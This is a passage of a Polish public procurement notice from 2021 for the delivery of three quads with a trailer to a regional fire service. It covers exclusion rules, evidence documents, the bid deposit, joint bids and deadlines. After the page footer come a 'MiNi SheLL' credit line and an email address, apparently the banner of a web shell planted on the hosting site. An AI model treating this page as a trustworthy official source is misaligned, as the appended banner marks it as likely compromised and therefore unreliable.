potwierdzającego zaistnienie jednej<br/>z podstaw wykluczenia, chyba że w tym wyroku został określony inny okres wykluczenia;<br/>5.2. w przypadkach, o których mowa w art. 108 ust. 1 pkt 1 lit. h i pkt 2 ustawy Pzp, gdy osoba, o<br/>której mowa w tych przepisach, została skazana za przestępstwo wymienione<br/>w art. 108 ust. 1 pkt 1 lit. h ustawy Pzp, na okres 3 lat od dnia uprawomocnienia się odpowiednio<br/>wyroku potwierdzającego zaistnienie jednej z podstaw wykluczenia, wydania ostatecznej decyzji<br/>lub zaistnienia zdarzenia będącego podstawą wykluczenia, chyba że w wyroku lub decyzji został<br/>określony inny okres wykluczenia;<br/>5.3. w przypadku, o którym mowa w art. 108 ust. 1 pkt 4 ustawy Pzp, na okres, na jaki został<br/>prawomocnie orzeczony zakaz ubiegania się o zamówienia publiczne;<br/>5.4. w przypadkach, o których mowa w art. 108 ust. 1 pkt 5, art. 109 ust. 1 pkt 4 ustawy Pzp, na<br/>okres 3 lat od zaistnienia zdarzenia będącego podstawą wykluczenia;<br/>5.5. w przypadkach, o których mowa w art. 108 ust. 1 pkt 6 ustawy Pzp, w postępowaniu o<br/>udzielenie zamówienia, w którym zaistniało zdarzenie będące podstawą wykluczenia.<br/>6. Zamawiający może wykluczyć wykonawcę na każdym etapie postępowania o udzielenie<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wraz z ofertą wykonawca zobowiązany jest złożyć aktualne na dzień<br/>składania ofert oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu, w zakresie wskazanym w swz. W przypadku, gdy o zamówienie wspólnie ubiega się<br/>dwa lub więcej podmiotów oświadczenia te powinny być złożone przez każdego z nich. Ponadto<br/>oświadczenie takie musi być złożone przez podmiot, na zasoby którego powołuje się wykonawca.<br/>Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu. Powyższe oświadczenie wykonawca<br/>składa według wzoru stanowiącego załącznik nr 4 do swz lub w formie JEDZ zgodnie z art. 125 ust. 2<br/>ustawy Pzp.<br/>2. Zamawiający wezwie w trybie art. 274 ustawy Pzp wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia, w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia<br/>podmiotowych środków dowodowych (oświadczeń lub dokumentów potwierdzających, że wykonawca<br/>nie podlega wykluczeniu oraz spełnia warunki udziału w postępowania), tj. takie dokumenty jak:<br/>2.1. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;]<br/>2.2. wykaz dostaw / usług porównywalnych z dostawami / usługami stanowiącymi przedmiot<br/>zamówienia, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy lub usługi zostały wykonane -w oparciu o wzór załącznika nr 5 do swz;<br/>3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast dokumentów, o których mowa w pkt. 2.1. powyżej, składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza<br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona<br/>ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w<br/>przepisach miejsca wszczęcia tej procedury.<br/>Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż<br/>3 miesiące przed ich złożeniem. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, nie wydaje się takich dokumentów, zastępuje się je dokumentem zawierającym<br/>odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub,<br/>jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania wykonawcy. Oświadczenie powinno został złożone nie wcześniej niż 3 miesiące przed<br/>jego złożeniem w Postępowaniu.<br/>4. W przypadku, gdy wykonawca posługiwać się będzie zasobami podmiotów trzecich w celu<br/>potwierdzania spełniania warunków udziału w postępowaniu, zamawiający żąda od wykonawcy<br/>przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 2.1.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Każdy wykonawca zobowiązany jest wnieść wadium, na cały okres związania ofertą, w<br/>wysokości 3000,00 zł (słownie: trzy tysiące złotych).<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>2.1. pieniądzu;<br/>2.2. gwarancjach bankowych;<br/>2.3. gwarancjach ubezpieczeniowych;<br/>2.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z<br/>dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2016 r.,<br/>poz. 359 ze zm.).<br/>3. Gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenie winny zostać złożone w formie<br/>dokumentu elektronicznego oryginalnego, podpisanego kwalifikowanym podpisem<br/>elektronicznym. Dokument wadialny powinien być wystawiony na Zamawiającego jako<br/>beneficjenta gwarancji, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego<br/>na pierwsze pisemne żądanie Zamawiającego. Dokument wadialny powinien wskazywać<br/>wszystkie przesłanki zatrzymania wadium wskazane w art. 98 ust. 6 ustawy Pzp.<br/>4. Oryginał wadium, sporządzony w postaci dokumentu elektronicznego podpisanego<br/>kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu, nie może zawierać<br/>postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu<br/>gwarancyjnego do wystawcy.<br/>5. Wadium w formie pieniężnej należy wnieść przelewem na niżej wskazany rachunek bankowy<br/>z podaniem tytułu: bądź w inny sposób jednoznacznie identyfikować postępowanie, którego<br/>wadium to dotyczy:<br/>Komenda Wojewódzka Państwowej Straży Pożarnej w Szczecinie<br/>Narodowym Banku Polskim, Oddział Okręgowy w Szczecinie, nr r-ku: 03 1010 1599 0034 9213<br/>9120 0000.<br/>Na dowodzie wpłaty należy zaznaczyć, jakiego zadania wadium dotyczy (Wadium w<br/>postępowaniu nr WT 2370.22.2021 pn. „Dostawa 3 szt. quadów z lawetą”<br/>6. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium<br/>w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko<br/>wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew i<br/>zaksięgował na rachunku Zamawiającego przed upływem terminu składania ofert. Wadium w<br/>innej formie niż pieniężna wnosi się wraz z ofertą w sposób przewidziany dla oferty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ich oferta<br/>musi spełniać następujące wymagania:<br/>a) w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców<br/>ubiegających się wspólnie o zamówienie, oddzielnie musi udokumentować, że nie podlega<br/>wykluczeniu z Postępowania na podstawie art. 108 ust. 1 ustawy Pzp oraz art. 109 ust. 1 pkt 4<br/>ustawy Pzp,<br/>b) Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w<br/>Postępowaniu lub do reprezentowania ich w Postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo należy przedłożyć w ofercie w formie, o której mowa<br/>w ust. 4.6) rozdz. XII swz,<br/>c) wszelka korespondencja w Postępowaniu prowadzona będzie wyłącznie z pełnomocnikiem, o<br/>którym mowa w ust. 4.8 lit. b) rozdz. XII swz,<br/>d) wypełniając Formularz Ofertowy, jak również inne dokumenty powołujące się na<br/>„Wykonawcę”; w miejscu „np. nazwa i adres Wykonawcy” należy wpisać dane dotyczące<br/>każdego z Wykonawców wspólnie ubiegających się o udzielnie zamówienia, a nie dane<br/>pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszcza się zmiany istotnych postanowień umowy w następujących sytuacjach:<br/>1) w przypadku obiektywnej niemożności zapewnienia wyposażenia quadów zgodnie<br/>z wymogami zawartymi w załączniku nr 1 do umowy z powodu zakończenia produkcji lub<br/>niedostępności na rynku elementów wyposażenia po zawarciu umowy – dopuszcza się zmianę<br/>umowy w zakresie rodzaju, typu lub modelu elementu wyposażenia quadów, pod warunkiem, że<br/>nowe wyposażenie będzie odpowiadało pod względem funkcjonalności wyposażeniu<br/>pierwotnemu, a jego parametry pozostaną niezmienione lub będą lepsze od pierwotnego;<br/>2) w przypadkach uzasadnionych potrzebami ZAMAWIAJĄCEGO, kwestiami ekonomicznymi<br/>lub logistycznymi – dopuszcza się zmianę umowy polegającą a ustaleniu innych niż pierwotnie<br/>zasad przeprowadzenia inspekcji produkcyjnej lub odbiorów. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-12 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-08</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com